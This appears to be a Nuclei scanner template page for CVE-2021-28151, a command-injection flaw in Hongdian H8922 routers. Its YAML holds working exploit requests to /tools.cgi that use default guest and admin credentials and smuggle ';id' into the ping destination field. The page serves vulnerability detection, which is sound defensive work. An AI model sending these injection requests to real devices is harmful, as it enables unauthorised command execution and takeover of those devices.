Hongdian H8922 3.0.5 - Remote Command Injection
ID: CVE-2021-28151
Severity: high
Author: gy741
Tags: cve2021,cve,hongdian,rce,injection
Description
Section titled “Description”Hongdian H8922 3.0.5 devices are susceptible to remote command injection via shell metacharacters into the ip-address (a/k/a Destination) field to the tools.cgi ping command, which is accessible with the username guest and password guest. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system.
YAML Source
Section titled “YAML Source”id: CVE-2021-28151
info: name: Hongdian H8922 3.0.5 - Remote Command Injection author: gy741 severity: high description: | Hongdian H8922 3.0.5 devices are susceptible to remote command injection via shell metacharacters into the ip-address (a/k/a Destination) field to the tools.cgi ping command, which is accessible with the username guest and password guest. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system. impact: | Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected device. remediation: | Apply the latest security patch or update to a non-vulnerable version of the Hongdian H8922 firmware. reference: - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/ - http://en.hongdian.com/Products/Details/H8922 - https://nvd.nist.gov/vuln/detail/CVE-2021-28151 - https://github.com/ARPSyndicate/kenzer-templates - https://github.com/ArrestX/--POC classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2021-28151 cwe-id: CWE-78 epss-score: 0.96385 epss-percentile: 0.99564 cpe: cpe:2.3:o:hongdian:h8922_firmware:3.0.5:*:*:*:*:*:*:* metadata: max-request: 2 vendor: hongdian product: h8922_firmware tags: cve2021,cve,hongdian,rce,injection
http: - raw: - | POST /tools.cgi HTTP/1.1 Host: {{Hostname}} Authorization: Basic Z3Vlc3Q6Z3Vlc3Q= Origin: {{BaseURL}} Referer: {{BaseURL}}/tools.cgi
op_type=ping&destination=%3Bid - | POST /tools.cgi HTTP/1.1 Host: {{Hostname}} Authorization: Basic YWRtaW46YWRtaW4= Origin: {{BaseURL}} Referer: {{BaseURL}}/tools.cgi
op_type=ping&destination=%3Bid
matchers-condition: and matchers: - type: word part: header words: - "text/html" - "application/x-www-form-urlencoded" condition: or
- type: regex regex: - 'uid=\d+\(([^)]+)\) gid=\d+\(([^)]+)\)'
- type: status status: - 200# digest: 4b0a00483046022100fdd5edcea432888b079f8452e3b680fdbcf345795247e4fc760f2161677ff6b9022100b48f954c8f70802f1e7be55c1cd746897ff645f24aa86d3ee188c399532addc1:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-28151.yaml"